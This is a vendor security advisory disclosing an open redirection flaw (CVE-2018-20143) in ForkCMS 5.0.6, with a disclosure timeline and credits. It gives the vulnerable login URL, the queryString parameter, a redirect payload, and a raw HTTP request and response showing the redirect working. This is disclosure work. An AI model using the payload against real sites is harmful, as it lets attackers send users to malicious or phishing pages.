Open Redirection Vulnerability in ForkCMS 5.0.6

Information

Advisory by Netsparker (now Invicti)
Name: Open Redirection vulnerability in ForkCMS
Affected Software: ForkCMS
Affected Versions: 5.0.6
Homepage: https://www.fork-cms.com/
Vulnerability: Open Redirection
Severity: High
Status: Not Fixed
CVE-ID: CVE-2018-20143
CVSS Score (3.0) : AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
Invicti Advisory Reference: NS-18-037

Technical Details

URL: http://{domain}/{forkcms_path}/{lang}/modules/profiles/login?queryString=http://netsparker.com
Parameter Name: queryString
Parameter Type: GET
Attack Pattern: http://netsparker.com

Request Headers

GET /modules/profiles/login?queryString=http://netsparker.com HTTP/1.1
Host: localhost
Cookie: PHPSESSID=m1k9ccmhmk4htctfo4tdkcg89q; interface_language=en; comment_author=3; comment_email=netsparker%40example.com

Response Headers

HTTP/1.1 302 Found
Set-Cookie: track=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.localhost; HttpOnly
Server: Apache/2.4.27 (Ubuntu)
X-Content-Type-Options: nosniff
Connection: Keep-Alive
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=5, max=79
X-Frame-Options: deny
Content-Type: text/html; charset=UTF-8
Location: http://netsparker.com
Content-Length: 360
Date: Sat, 21 Oct 2017 17:21:36 GMT
Cache-Control: no-cache, private

Advisory Timeline

24th October 2017 – First Contact
31st December 2018 – Advisory Released

Credits & Authors

These issues have been discovered by Omer Citak while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.